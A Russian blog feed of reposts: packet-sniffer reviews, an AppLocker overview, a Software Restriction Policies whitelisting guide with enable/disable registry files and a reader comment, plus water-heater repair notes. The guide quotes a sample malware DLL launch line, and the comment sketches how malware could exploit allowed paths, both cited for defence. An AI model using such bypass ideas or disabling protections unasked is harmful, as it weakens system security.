Помимо прекрасных возможностей по созданию разного рода фильтров, программа Ethereal позволяет выполнять всесторонний анализ трафика, представляя его в графической форме или в форме статистического отчета. К примеру, можно выполнить анализ TCP-трафика по пропускной способности, по времени передачи туда и обратно и по номерам пакетов. Результаты анализа представляются в виде графиков. Так, анализ, использующий порядковые номера пакетов и время, позволяет получить представление о том, какой объем данных был послан в различные моменты времени, поскольку порядковые номера пакетов увеличиваются на размер пакета данных.

В целом можно сказать, что пакетный анализатор Ethereal 0.10.14 является очень мощным инструментальным средством диагностики сетей. Конечно, для детального освоения пакета потребуется немало времени. Однако если все-таки удастся преодолеть этот барьер и освоить пакет Ethereal, то необходимость освоения других аналогичных продуктов попросту отпадет.

Analyzer v.2.2

Утилита Analyzer v.2.2 компании NetGroup — еще один небольшой по объему пакетный анализатор, распространяемый на бесплатной основе. К достоинствам данной утилиты можно отнести то, что она не требует инсталляции на компьютер. Единственное, что необходимо, — наличие установленной утилиты WinPcap, которая используется сниффером Analyzer v.2.2. Кроме того, пакетный анализатор Analyzer v.2.2. очень прост в обращении и может быть рекомендован для начинающих пользователей. Недостатки этого анализатора вытекают из его достоинств — простота в обращении не позволяет производить глубокий анализ пакетов и создавать фильтры по любой характеристике пакета.

Утилита Analyzer v.2.2 поддерживает выбор интерфейса: сетевой адаптер или аналоговый модем. Работа в беспроводных сетях не предусмотрена.

Графический интерфейс пакетного анализатора Analyzer v.2.2 содержит три традиционных окна (рис. 8). В первом окне отображаются перехваченные пакеты с информацией о времени получения пакета, MAC-адресах отправителя и получателя, IP-адресах отправителя и получателя, протоколе передачи, портах источника и получателя пакетов, размер TCP-окна, номер последовательности пакета и номер подтверждения этого пакета. Во втором окне выводится декодированная информация об отдельных полях пакета, а третье окно отображает содержимое самого пакета.

 

Рис. 8. Главное окно пакетного анализатора Analyzer v.2.2

Рис. 8. Главное окно пакетного анализатора Analyzer v.2.2

Из недостатков данного пакета можно отметить невозможность использования фильтров после сбора информации. Единственное, что можно сделать в данном случае, — это выделить по заданному фильтру пакеты. Сами фильтры, как мы уже отмечали, не предоставляют гибкого механизма (в сравнении с пакетом Ethereal) сбора требуемой информации.

Для сравнения возможностей пакетов Analyzer v.2.2 и Ethereal 0.10.14 мы провели захват одного и того же трафика и проанализировали его сначала с помощью программы Ethereal 0.10.14, а затем — Analyzer v.2.2. Как и ожидалось, информация, выдаваемая об отдельном пакете анализатором Ethereal 0.10.14, более подробная, чем та, что выдает анализатор Analyzer v.2.2.

Поэтому еще раз подчеркнем, что программа Analyzer v.2.2 представляет интерес только для начинающих пользователей и в качестве средства ознакомления с принципами функционирования сетей и структурами пакетов различных протоколов.

CommView 5.0

В отличие от всех рассмотренных выше анализаторов, программа CommView 5.0 (www.tamos.com) распространяется на коммерческой основе и для свободного скачивания доступна лишь ее демонстрационная версия с урезанной функциональностью.

Данный пакетный анализатор предназначен для мониторинга локальной сети и соединения с Интернетом. Он способен захватывать пакеты, проходящие через сетевой адаптер или модем, декодировать их и представлять достаточно подробную информацию в удобном для восприятия виде. В отличие от большинства снифферов, программа CommView 5.0 не требует предварительной установки на ПК WinPcap.

Сниффер CommView 5.0 поддерживает операционные системы Windows 98/Me/NT/2000/XP/2003 и Windows XP 64-bit Edition. Перечень поддерживаемых протоколов довольно обширен, и в этом плане можно рассчитывать на предоставление достаточно подробной информации о перехваченных пакетах.

Пакетный анализатор CommView 5.0 поддерживает возможность создания гибко настраиваемых фильтров (правил), однако недостатком здесь является то, что эти фильтры нельзя применить к уже имеющимся собранным пакетам (создаваемые правила распространяются только на захват пакетов).

Графический интерфейс программы CommView 5.0 традиционен — три окна, в первом из которых отображаются захваченные пакеты, во втором — декодированная информация об отдельном пакете, а в третьем — содержимое самого пакета (рис. 9).

 

Рис. 9. Главное окно пакетного анализатора CommView 5.0

Рис. 9. Главное окно пакетного анализатора CommView 5.0

Информация в окне с захваченными пакетами довольно скудная. Отображаются лишь тип протокола, IP- и MAC-адреса источника и получателя пакета, время и порт назначения и отправления.

Окно с декодированной информацией об отдельном пакете значительно более информативно и по детализации предоставляемой информации не уступает анализатору Ethereal (во всяком случае это касается протокола TCP).

К достоинствам анализатора CommView 5.0 можно отнести возможность просмотра подробной статистической информации о сеансе перехвата, которая представляется в отдельном окне в удобном графическом виде (рис. 10), а также составление отчета в отдельном файле.

Еще одним отличием анализатора CommView 5.0 является возможность настройки сигнала тревоги по предопределенным событиям. В частности, можно задать правила, при выполнении которых будет послано оповещение по электронной почте.

 

Рис. 10. Статистическая информация о сеансе перехвата в программе CommView 5.0

Рис. 10. Статистическая информация о сеансе перехвата в программе CommView 5.0

Кроме того, сниффер CommView 5.0 позволяет заменять IP- и MAC-адреса сетевого адаптера на имена пользователей, что упрощает мониторинг сети. С целью диагностики сети данный сниффер имеет встроенный генератор трафика с возможностью настройки размера передаваемого пакета и скорости генерации пакетов.

И наконец, последняя особенность сниффера CommView 5.0 — возможность создания удаленного агента, что позволяет производить удаленный мониторинг сети. Для реализации данной функции на удаленном ПК необходимо инсталлировать программу Remote Agent, а используя консоль CommView 5.0, можно устанавливать соединение с компьютером, на котором инсталлирована утилита Remote Agent.

Iris Network Traffic Analyzer4.07

Пакетный анализатор Iris 4.07 (www.eeye.com) от компании eEye digital Security представляет собой мощное инструментальное средство для диагностики локальных сетей и каналов связи с Интернетом. Программа Iris 4.07 распространяется на коммерческой основе, однако на сайте производителя доступна ее ознакомительная версия.

Несмотря на заявленную в документации поддержку только операционных систем Windows 95/98/NT/2000, реально этот список можно расширить, и, скорее всего, данная программа способна работать с любой операционной системой семейства Windows.

Графический интерфейс программы (рис. 11) интуитивно понятен, прост и традиционен для пакетных снифферов. Имеется три окна, в первом из которых отображаются перехваченные пакеты с достаточно подробной информацией о каждом пакете, включающей MAC- и IP-адреса источника и отправителя пакетов, тип пакета, протокол, порт отправления и назначения, размер пакета, а также порядковые номера SEQ и ACK. Подробная декодированная информация о каждом отдельном пакете доступна во втором окне, а содержимое каждого пакета — в третьем окне. Нужно отметить, что по степени детализации предоставляемой информации данный пакет не уступает анализатору Ethereal.

 

Рис. 11. Главное окно пакетного анализатора Iris 4.07

Рис. 11. Главное окно пакетного анализатора Iris 4.07

Пожалуй, единственный недостаток данного анализатора заключается в том, что отображаемые в первом окне пакеты не маркируются цветом (как это делается в других анализаторах), что создает определенное неудобство при визуальном восприятии информации.

Пакетный анализатор Iris 4.07 позволяет очень гибко и в то же время просто настраивать фильтры для захвата пакетов. Так, используя диалоговое окно (рис. 12) Edit filter settings, можно создавать фильтры по MAC-адресам источника и получателя, по IP-адресам источника и получателя, по портам, протоколам, а также по вхождению в содержимое пакета определенного слова. Кроме того, можно настраивать фильтры на размер пакета и на фрагмент пакета в HEX-формате.

 

Рис. 12. Настройка пакетного фильтра

Рис. 12. Настройка пакетного фильтра в анализаторе Iris 4.07

Отметим, что недостатком программы Iris 4.07 является то, что фильтры можно создавать только для вновь принимаемых пакетов, а реализовать фильтрацию уже перехваченных пакетов не представляется возможным. Вместо этого в программе предусмотрен поиск нужных пакетов по фильтру.

Другим отличием программы Iris 4.07 является возможность отображения в графической форме статистической информации во время запуска режима захвата пакетов. Так, имеется возможность отображать график скорости передачи пакетов (рис. 13), диаграмму распределения размеров пакетов (рис. 14) и многое другое.

 

Рис. 13. График скорости передачи пакетов

Рис. 13. График скорости передачи пакетов
в анализаторе Iris 4.07

Рис. 14. Диаграмма распределения размеров пакетов в анализаторе Iris 4.07

Рис. 14. Диаграмма распределения размеров пакетов в анализаторе Iris 4.07

Помимо перечисленных возможностей анализатор пакетов Iris 4.07 позволяет создавать HTML-отчеты о сеансе связи, куда включается наиболее важная информация, в том числе статистика о посещении сайтов, объеме переданного и принятого трафика и многое другое. Также программа Iris 4.07 имеет встроенный генератор трафика, что удобно для диагностики узких мест в сети.

Еще одной особенностью программы Iris 4.07 является наличие встроенного модуля, позволяющего фиксировать все попытки соединения с компьютером, что обеспечивает отслеживание попыток несанкционированного проникновения в сеть.

КомпьютерПресс 4'2006

Рубрики:  Программное обеспечение
Информационная безопасность
Информационная безопасность ОС Windows

Метки:  

ворос к филологу

Воскресенье, 13 Сентября 2015 г. 23:25 + в цитатник

Как правильно писать - "Четыреста один бюллетень или четыресто один бюллетень"?

 

Простой вопрос, но уже чуть-чуть полдвенадцатого ночи.

 

 

Рубрики:  На листочках
События и факты
мой Смоленск
Пьеса

Что такое AppLocker?

Вторник, 08 Сентября 2015 г. 18:02 + в цитатник

Что такое AppLocker?

34 из 44 оценили этот материал как полезный - Оценить эту тему

Обновлено: Ноябрь 2009 г.

Назначение: Windows 7, Windows Server 2008 R2

В этом разделе приводится общее описание функции AppLocker и объясняется ее отличие от политик ограниченного использования программ.

AppLocker - это новая функция операционных систем Windows Server 2008 R2 и Windows 7, которая расширяет возможности и функциональность политик ограниченного использования программ. AppLocker включает новые возможности и расширения, позволяющие создавать правила разрешения и запрета выполнения приложений на основе уникальных удостоверений файлов, а также указывать пользователей или группы, которым разрешено запускать эти приложения.

Используя AppLocker, можно выполнять следующие задачи.

  • Управлять приложениями следующих типов: исполняемые файлы (с расширениями EXE и COM), скрипты (с расширениями JS, PS1, VBS, CMD и BAT), файлы установщика Windows (с расширениями MSI и MSP) и файлы библиотек DLL (с расширениями DLL и OCX).

  • Определять правила на основе атрибутов, производных от цифровой подписи, включая издателя, имя продукта, имя файла и версию файла. Например, можно создать правила на основе атрибута издателя, который сохраняется при всех обновлениях, или правила для конкретной версии файла.

  • Назначать правило группе безопасности или отдельному пользователю.

  • Создавать исключения для правил. Например, можно создать правило, разрешающее запуск всех процессов Windows, за исключением редактора реестра (Regedit.exe).

  • Использовать режим только аудита для развертывания политики и выяснения ее влияния перед применением.

  • Импортировать и экспортировать правила. Импорт и экспорт затрагивают всю политику. Например, в случае экспорта политики экспортируются все правила из всех коллекций правил, включая параметры применения для коллекций правил. В случае импорта политики все условия существующей политики перезаписываются.

  • Оптимизировать создание правил AppLocker и управление ими с помощью командлетов Windows PowerShell.

AppLocker помогает сократить объем работы администраторов и снизить расходы организации на управление вычислительными ресурсами за счет уменьшения числа обращений в службу поддержки, возникающих вследствие выполнения пользователями неутвержденных приложений.

Сведения о сценариях управления приложениями, в которых полезно использовать AppLocker, см. в разделе Сценарии использования политик AppLocker.

Отличие функций AppLocker от политик ограниченного использования программ

В следующей таблице сравниваются функция AppLocker и политики ограниченного использования программ.

 

Функция Политики ограниченного использования программ AppLocker

Область действия правил

Все пользователи

Конкретный пользователь или группа

Поддерживаемые условия для правил

Хэш файла, путь, сертификат, путь реестра и зона Интернета

Хэш файла, путь и издатель

Поддерживаемые типы правил

Определяются уровнями безопасности.

  • Запрещено.

  • Обычный пользователь.

  • Не ограничено.

Разрешение и запрет

Действие правила по умолчанию

Не ограничено

Неявный запрет

Режим только аудита

Нет

Да

Мастер одновременного создания нескольких правил

Нет

Да

Импорт и экспорт политик

Нет

Да

Коллекция правил

Нет

Да

Поддержка Windows PowerShell

Нет

Да

Настройка сообщений об ошибках

Нет

Да

Рубрики:  Программное обеспечение
Информационная безопасность
Информационная безопасность ОС Windows

Метки:  

Сейчас лучше использовать "Software Restriction Policies"

Вторник, 08 Сентября 2015 г. 17:57 + в цитатник

Варианты с "RestrictRun" и "DisallowRun" были в Винде исторически первыми (не считая сторонних решений), легко обходятся переименованием исполняемых файлов, кроме того, влияют лишь на запуск программ из среды Windows Explorer (только!). Сейчас лучше использовать "Software Restriction Policies".
Эти два метода не имеют друг к другу прямого отношения. Нет смысла использовать одновременно оба. С другой стороны, если очень хочется, почему бы и не использовать? Тогда настраивайте оба по отдельности.

Рубрики:  Программное обеспечение
Информационная безопасность
Информационная безопасность ОС Windows

Метки:  

Эффективная защита от вирусов с помощью Software Restriction Policies.

Вторник, 08 Сентября 2015 г. 17:54 + в цитатник
В колонках играет - Шопен
Настроение сейчас - грустновато

Эффективная защита от вирусов с помощью Software Restriction Policies.

Понедельник, 30 - Май - 2011 Комментарии (93)

1. С чего начинается защита от вирусов и других зловредных программ?

        Защита от компьютерных вирусов, «троянских коней» и прочей дряни в первую очередь зависит от того, с какими привилегиями ты заходишь в компьютер. Обычно все учётные записи (логины) делятся на две категории — административные, предназначенные для установки программ и настройки системы; и стандартные (с ограниченными правами), предназначенные для ежедневной работы. Хочешь что-то настроить, проинсталлировать? Входи Администратором. Хочешь смотреть фильмы, писать курсовую, общаться в Skype? Входи стандартным пользователем.

        Дело в том, что у стандартных пользователей нет прав на инсталляцию программ и настройку системы, за счёт чего она работает весьма стабильно и безопасно. Что-то напортачить или сломать не получится, на это у пользователя просто нет прав. Компьтерный вирус — это не чёрная магия, а программа, просто компьютерная программа, поэтому заразить систему вирусом рядовой пользователь тоже не может. Причём, компьютеру всё равно, новый это вирус или старый, особо хитрый или примитивный — если имеющихся привилегий недостаточно, занести вирус в системную папку или прописать его автозапуск в системном реестре не получится никак.

SRP_StandardUser

Рис. 1. Уровень привилегий учётной записи пользователя в Windows 7

        Вне зависимости от того, работаем мы дома или в офисе, в систему всегда следует входить только с ограниченными привилегиями. Системные администраторы должны обладать двумя учётными записями — и рядовой, и административной, но использовать последнюю только при доказанной необходимости. Тип используемой вами учётной записи можно уточнить в Control Panel (Панели Управления).

        Однако, существуют зловредные программы, которые способны сохраняться не только в системных папках, но и в User Profile — так называемом профиле, рабочей среде пользователя. Эти программы запускаются каждый раз при входе пользователя в систему. Обычно вирусы такого типа «приезжают» на flash-дисках, рассылаются через программы обмена сообщениями и по электронной почте, попадают в компьютер со специальным образом созданных веб-страниц. Для борьбы с подобного типа угрозами в Windows-системах существует весьма простая и надёжная настройка безопасности — Software Restriction Policies (Политики ограничения программ).

2. Что же такое Software Restriction Policies?

        С помощью SRP можно создать «белый список» программ, которые заведомо разрешены для запуска; все остальные программы будут заблокированы. Например, мы говорим системе «запускай всё из папок C:\Windows, C:\Program Files, D:\Games, а остальное не разрешается». В результате, приезжающий на флешке вирус тихо «обламывается», не сумев запуститься с неразрешённого пути E:\ или Z:\. Что-то попыталось пролезть с ненадёжного веб-сайта? Оно тоже не запустится, так как было сохранено в папке профиля пользователя Temporary Internet Files или %Temp%. А мы оттуда ничего запускать не разрешали! Присланный посредством Skype «новый супер-пупер скринсейвер», на самом деле представляющий собой троянскую программу, тоже не запустится.

        Политика Software Restriction Policies сильно выигрывает в сравнении с любыми тормозяще-навороченными, но в то же время очень ненадёжными антивирусными программами, будь то Kaspersky, NOD или Avast (название и производитель не имеют значения). Ловля блох антивирусным монитором — компьютерный аналог «русской рулетки». Причём, далеко не факт, что вы в ней выиграете. В то же время, SRP сразу же отбросит всё неразрешённое, не вникая, что это там было, хорошее или плохое.

        На самом деле, политика не предотвратит сохранение тела вируса на жёстком диске. SRP — не антивирусная программа, она не анализирует содержимое файлов. Но и запуститься хранящейся на диске или flash-носителе потенциально деструктивной программе она не позволит.

        SRP не нужно откуда-то скачивать, она уже встроена в следующие системы Microsoft:

  • Windows XP Professional, Windows XP Media Center 2005;
  • Windows Vista Business, Windows Vista Enterprise & Ultimate;
  • Windows 7 Professional, Windows 7 Enterprise & Ultimate;
  • Windows Server 2003 и 2008 (все редакции);

        К сожалению, никакие системы из серии Windows Home не поддерживаются.

3. Как включить и настроить политику SRP?

        Для включения SRP зайдите в систему с правами администратора и выполните команду Start → Run → gpedit.msc. В разделе Computer Configuration (Конфигурация компьютера) раскройте папку Windows Settings → Security Settings → Software Restriction Policies.

SRP_CreatePolicy

Рис. 2. Включение политики SRP.

        На всех упомянутых ранее версиях Windows это окно выглядит примерно одинаково. Однако, в политиках домена Active Directory вы можете найти SRP и в разделе User Configuration (Конфигурация пользователя). Я рекомендую выполнять базовую конфигурацию SRP на уровне Computer Configuration, а User Configuration использовать только для расширения области действия политики для некоторых групп пользователей.

        Щёлкните правой кнопкой по папке Software Restriction Policies и выберите команду Create New Policies. Политика создана, теперь нужно сделать дополнительные настройки. Выполните двойной щелчок по значению Enforcement и укажите Apply to: All software files и Apply to: All Users. Тем самым, проверке будут подлежать все программы и динамические библиотеки, и защищены будут все пользователи, включая самых опасных — администраторов.

        Параметр Apply to: All software files может оказаться неприменимым для вашей системы, если используются приложения, вызывающие dll-модули некорректными методами либо хранящие множество своих модулей в профилях пользователей. Чтобы облегчить управление такими приложениями, можно ослабить уровень защиты, переключив настройку в положение Apply to: All software except libraries. Однако, учтите, что количество зловредных программ, выполненных в виде динамических библиотек и вызываемых строкой вида rundll32.exe C:\Recycler\virus.dll, неуклонно растёт. И только более строгая, полная фильтрация позволяет защитить систему от крайне опасной проблемы, носящей название DLL Hijacking.

SRP_Enforcement

Рис. 3. Настройка области действия политики SRP.

        Один параметр может оказаться досадной и никак не улучшающей безопасность помехой — по умолчанию, SRP обрабатывает не только исполняемые файлы, но и некоторые другие типы файлов — например, ярлыки (Shortcuts). Выполните двойной щелчок по значению Designated File Types и удалите расширение LNK из списка. Замечу, сами ярлыки и их целевые файлы обрабатываются политикой отдельно. Таким образом, удаляя LNK из списка обрабатываемых расширений, вы не понижаете уровень безопасности системы — создать ярлык на неразрешённый файл и таким образом запустить его в обход политики всё равно будет невозможным.

SRP_FileTypes

Рис. 4. Настройка обрабатываемых политикой SRP типов файлов.

        Существуют несколько режимов работы SRP:

  • Disallowed: режим «белого списка». По умолчанию, запрещён запуск любых программ, кроме описанных в правилах политики;
  • Basic User: режим принудительного ограничения привилегий. Все программы запускаются с привилегиями рядового пользователя, кроме исключений, описанных политикой;
  • Unrestricted: режим «чёрного списка». По умолчанию, разрешается запускать любые программы, кроме отдельно заблокированных в правилах политики.

        Раскройте папку Security Levels и назначьте режим Disallowed в качестве основного.

SRP_DefaultLevel

Рис. 5. Включение режима «белого списка» политики SRP.

        В контейнере Additional Rules перечисляются программы, которые мы разрешаем запускать. Обычно особого внимания это от нас не требует, так как политика автоматически указывает, что все программы, находящиеся в Program Files и Windows, разрешены для запуска. Таким образом, большинство программ будет работать нормально, а стандартные пользователи не имеют прав на изменение содержимого этих папок. Однако, если ваши программы установлены в иные каталоги, добавьте в список дополнительные разрешённые пути или хэш-суммы исполняемых модулей в режиме Unrestricted.

        По возможности, не добавляйте в Additional Rules пути, которые открыты рядовым пользователям для Записи. «Белый список» Software Restriction Policies позволяет защитить систему не только от случайно приносимых вирусов, но также от других нежелательных программ — например, чат-клиентов, игр, альтернативных браузеров. Ни в коем случае не добавляйте в Additional Rules пути вида C:\, %Temp% или F:\ (путь к сменному носителю) с типом доступа Unrestricted, так как это аннулирует весь эффект политики.

SRP_AdditionalRules

Рис. 6. Настройка списка разрешённых для запуска программ.

        Итак, политика настроена. Для того, чтобы она вступила в силу, перезагрузите систему. Дальнейшие настройки и переключения режимов работы SRP перезагрузку требовать не будут.

4. Что делать, если что-то перестало работать?

        Существует вероятность, что самая важная для вас программа перестанет работать из-за блокировок, налагаемых политикой SRP. В этом случае, вам на помощь приходит системный журнал, с содержимым которого можно ознакомиться, выполнив команду Start → Run → eventvwr.msc.

SRP_EventViewer

Рис. 7. Просмотр журнала событий Application.

        Если действительно SRP является причиной неработоспособности программы, вы увидите в журнале одно или несколько предупреждений от источника SoftwareRestrictionPolicies с кодом 865. Внутри сообщения указывается имя и путь заблокированного модуля. Добавьте этот путь или цифровой отпечаток (hash) программы в Additional Rules и запустите программу ещё раз.

5. Теперь всё работает, но что будет дальше?

        Иногда вам придётся устанавливать новые программы, а также обновлять их и саму систему. Для этого политику SRP нужно временно отключать. Создайте два файла, которые помогут вам облегчить отключение/включение SRP, и сохраните их в папке Windows:

SRP_Disable.reg

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers]
"DefaultLevel"=dword:00040000

SRP_Enable.reg

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers]
"DefaultLevel"=dword:00000000

        На самом деле, значение DefaultLevel не отключает политику, а переводит её из режима «белого списка» Default: Disallowed в режим «чёрного списка» Default: Unrestricted, разрешая запуск любых программ, кроме тех, что описаны в контейнере Additional Rules в режиме Disallowed. По возможности, не создавайте записи с типом доступа Disallowed, так как это осложняет работу с политикой.

        Создайте ярлыки на reg-файлы на рабочем столе Администратора. Процедура установки новых программ усложняется лишь ненамного по сравнению с тем, как вы привыкли это делать:

  • отключаем защиту SRP ярлыком SRP Disable;
  • инсталлируем программу или выполняем обновление системы;
  • снова включаем SRP ярлыком SRP Enable.

SRP_Shortcuts

Рис. 8. Ярлыки управления режимами SRP.

        Возможно, поначалу вы будете забывать включать политику после установки программ. Можно настроить систему таким образом, чтобы вручную отключенная защита включалась снова через регулярные интервалы времени. Запустив программу gpedit.msc, в секции Computer Configuration откройте папку Administrative Templates -> System -> Group Policy и в параметре Registry Policy Processing выберите Enabled и включите галочку Process even if the GPO have not changed. В любом случае, после перезагрузки компьютера Software Restriction Policies включится автоматически.

        Software Restriction Policies не гарантирует стопроцентную защиту от зловредных программ, но её эффективность может быть по крайней мере на несколько порядков выше эффективности обычных антивирусных программ. Успехов в повышении уровня безопасности вашего компьютера!

Last Content Update: 16-Jan-2011

 

93 Responses to Эффективная защита от вирусов с помощью Software Restriction Policies.

  1. Уведомление: Вирус Snatch — эпидемия глупости « Peter Gubarevich

  2. Уведомление: Популярные заблуждения в вопросах защиты от компьютерных вирусов « Peter Gubarevich

  3. Как гениальное просто и под рукой !!!

  4. Здравствуйте.

    Большое спасибо за инструкцию. С Вашей подачи стал этим пользоваться. Чему очень рад. Но есть несколько уточнений и вопросов.

    1. Странно, что Вы против антивирусов. Ведь когда скачиваешь дистрибутив даже с официального сайта, не можешь на все 100% быть уверенным в том, что там нет вирусов. Сайт могли взломать и заразить данные. Конечно, это маловероятно, но все же реально. Если речь идет о компании, в которой у сотрудников нет возможности записывать на компьютер свои данные и нет доступа в Интернет, то тогда согласен. Дома же или на работе, где сотрудник может приносить с собой данные (программист, например) и/или имеет доступ в Интернет без антивируса опасно будет. Если исполняемый файл будет заражен вирусом с учетом использования пользователем SRP, то он может через реестр просмотреть разрешенные пути и туда прописать себя и автозапуск всеми доступными способами. У меня на семерке эти пути прописаны в
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers00000\Paths (цифры я изменил сознательно). И этот путь доступен для чтения пользователю с ограниченными правами.

    2. У x64 систем по умолчанию не прописан путь к Program Files (x86), что странно. У меня у x64 семерки только %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% и %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir%. Остальное прописывал сам. На работе в Win XP x64 тоже самое. Поправьте это в инструкции.

    3. Думаю, в список исключаемых типов файлов стоит добавить расширение MSU (изолированный пакет Центра обновления Microsoft). Поправьте это в инструкции.

    4. Как правильно прописывать путь: «C:\Program Files (x86)», «%ProgramFiles(x86)%» или %SystemDrive%\Program Files (x86)? Путь взят в качестве примера.

    5. Можно как-то автоматизировать прописывание путей белого списка? Имеется в виду компьютер, не подключенный к домену.

    6. Столкнулся недавно с проблемой, когда .NET Framework 4.0 и (если я не напутал) впоследствии обновления к нему на XP ставились предварительно распаковываясь в корень диска. Естественно, при такой ситуации SRP нужно выключать, но как быть в организации, где очень много компьютеров (это я не про себя)? Вырубать защиту всем до тех пор пока все компы не проставят обновления? Так что сама Microsoft иногда противоречит своей системе безопасности. Другие обновления без проблем устанавливаются без выключения SRP.

    7. Некоторые программы после установки или удаления что-то доделывают после перезагрузки. Всегда ли это будет работать при автовключении SRP? У меня проблем пока не было, но хочу узнать про Ваш опыт на данный счет.

    Андрей Владимирович


Рубрики:  Программное обеспечение

Метки:  

Запасные части для ремонта Аристон SGHP 30 VE 1,5 SLIM

Воскресенье, 06 Сентября 2015 г. 23:57 + в цитатник

Запасные части для ремонта Аристон SGHP 30 VE 1,5 SLIM

Основные характеристики
Торговая марка Ariston
Модель SGHP 30 VE 1,5 SLIM
Тип водонагревателя Накопительный
Способ нагрева Электрический
Способ установки Вертикальный
Нагревательный элемент Трубчатый
Объем 30л.
Мощность 1500W
Напряжение 230V
 
Запчасти к другим моделям Аристон
Инструкция .pdf

 

Основные запасные части для ремонта водонагревателя Аристон SGHP 30 VE 1,5 SLIM
Фото Артикул Описание Прочее Наличие Цена
Розн.
ТЭН
Оригинальный ТЭН Аристон 1500W/230V
65150401 Нагревательный элемент ТЭН 1500W/230V, под анод М5, в/з 65181000
Оригинальный ТЭН в форме обратной гибки с трубкой под датчик, мощностью 1,5кВт, изготовлен из нержавеющей стали на фланце с размерами 105х75мм.
Посмотреть полное описание:
1500W
230V

много
1800р.
Термостат (терморегулятор)
Термостат стержневой с термозащитой RTS 3-R 300 72/90/16А, с флажком, в/з 691217
181336 Термостат стержневой с термозащитой RTS 3-R 300 72/90/16А, с флажком
Монофазный стержневой термостат на 16А типа RTS с двухполюсной аварийной термозашитой, регулировка температуры 40-80°С, используется для поддержания заданной температуры жидкости в автоматическом режиме.
Посмотреть полное описание:
Длина:
270мм

много
650р.
Уплотнительная прокладка для ТЭНа
Прокладка резиновая, овальная, фланцевая с бортиком
570340 Прокладка резиновая, овальная, фланцевая с бортиком
Резиновая прокладка на прижимной овальный фланец, используется как комплектующие для ТЭНов.
Посмотреть полное описание:
Размеры:
105х75мм

есть
250р.
Магниевый анод
Анод магниевый М5 D22х230х10, в/з 993014
818813 Анод магниевый М5 D22х230х10, в/з 993014
Магниевый анод на резьбовой шпильки М5, длина анода 230мм. Используется в водонагревателях Аристон.
Посмотреть полное описание:
Резьба:
М5
Длина:
230мм

много
300р.
Предохранительный клапан
Клапан предохранительный с рычажком для водонагревателя 8,5 Бар
180404 Клапан предохранительный с рычажком для водонагревателей, в/з 571730
Предохранительный клапан сброса давления до 8,5 Бар с рычажком, диаметр резьбы G½, используется в водонагревателях: Аристон.
Посмотреть полное описание:
Резьба:

Давление:
8,5 Бар

есть
450р.
Рубрики:  Практические рекомендации
Расширяя кругозор

Терморегулятор для водонагревателя: несколько советов

Воскресенье, 06 Сентября 2015 г. 23:57 + в цитатник

Терморегулятор для водонагревателя: несколько советов

 

Проблемы в области ЖКХ в нашей стране, к сожалению, далеко не редкость. Но некоторые из них, например, отсутствие горячей воды, можно решить своими силами. Для этого нужно приобрести и установить водонагреватель. Наслаждаться душем комфортной температуры, даже когда у других нет горячей воды, позволит наливной водонагреватель с терморегулятором.

Рассмотрим, из чего состоит водонагреватель.

Основные элементы водонагревателя

  • Внешний корпус. Может быть пластиковым, металлическим или его конструкция может сочетать элементы обоих видов.
  • Внутренний бак. Обычно сделан из нержавеющей стали.
  • Терморегулятор (термостат)
  • Термоэлектронагреватель (тэн)

На двух следующих элементах водонагревателя остановимся более подробно.

Схема терморегулятора для водонагревателя

Терморегулятор

Итак, что это за зверь такой, терморегулятор для водонагревателя, и для чего он нужен? Все просто: терморегулятор предназначен для поддержания определенной температуры воды с помощью включения и отключения нагревательного элемента (тэна). А еще, если в нагревательном элементе возникнет неисправность, терморегулятор (или термостат) отключит его в аварийном порядке (термозащита).

Существует 3 вида терморегуляторов.

Виды терморегуляторов

  • Стержневой терморегулятор для водонагревателя. Он вставляется в специальную трубку, расположенную на корпусе водонагревателя длиной 25-45 см. Наиболее часто применяются стержневые терморегуляторы для водонагревателей термекс.
  • Капиллярный терморегулятор для водонагревателя. Он имеет вид трубки, в которой содержится жидкость. Она изменяет свой объем в зависимости от температуры в емкости нагревателя. При определенной температуре нагрева жидкость оказывает давление на мембрану, связанную с электрическими контактами.
  • Электронный терморегулятор для водонагревателя. Термосопротивление, которое входит в его состав, реагирует, когда изменяется температура жидкости. Обычно в водонагреватель устанавливается два таких прибора. Один из них выполняет функцию регулировки температуры, а другой — функцию защиты (отключение в аварийном порядке).

Подобрать терморегулятор для определенной модели водонагревателя можно, основываясь на геометрических размерах тэна, величины его мощности, а также объеме бака водонагревателя.

Терморегуляторы для водонагревателя аристон бывают электромеханические и электронные. Принцип работы первых основан на свойстве биметаллов, функционирование вторых осуществляется с помощью входящего в их состав датчика высокой точности.

В зависимости от возможностей, их можно разделить на простые, программируемые и двухзонные. По способу установки модели делятся на накладные и врезные.

Если терморегулятор неисправен

Как правило, ремонт терморегулятора водонагревателя заключается в его замене на новый. А как обнаружить неисправность терморегулятора? Она может иметь место, если при подаче напряжения тэн не включается, а также если срабатывает контрольный терморегулятор. Чтобы проверить работоспособность терморегулятора, его необходимо снять с водонагревателя, затем поставить на измерение сопротивления (Ом). Регулировочную рукоятку выставим на максимальное положение и измерим сопротивление на контактах терморегулятора (ввод/вывод). Если тестер не проявляет никакой реакции, это говорит о неисправности элемента. Он не подлежит ремонту, и нужно будет для замены купить терморегулятор для водонагревателя термекс, аристон или другой марки, той же, что и водонагреватель.

 

Терморегулятор MTS

В случае срабатывания контрольного терморегулятора определяем неисправность следующим образом: нужно поставить снятый терморегулятор в минимальное положение и установить измерительные щупы прибора на контактах. Затем с помощью зажигалки нагреть стержень или колбу терморегулятора. Если он работает исправно, то вы будете наблюдать следующую картину: термореле сработает и разомкнет цепь, сопротивление на контактах будет стремиться к бесконечности то есть как при разведении щупов прибора в стороны. Если этого не произошло, значит термореле неисправно и необходимо заменить терморегулятор. Для этого нужно правильно подобрать данный элемент водонагревателя.

Как правильно выбрать терморегулятор

Желательно купить терморегулятор для водонагревателя на замену той же модели, что был установлен изначально. Но если вы не нашли в продаже точно такую же модель, то при выборе необходимо учитывать следующее:

  • тип терморегулятора, установочные размеры и способ крепления;
  • величину тока, на который рассчитан терморегулятор;
  • функции, которые он выполняет (регулировка температуры, защитная функция или обе одновременно).

Термоэлектронагреватель (тэн)

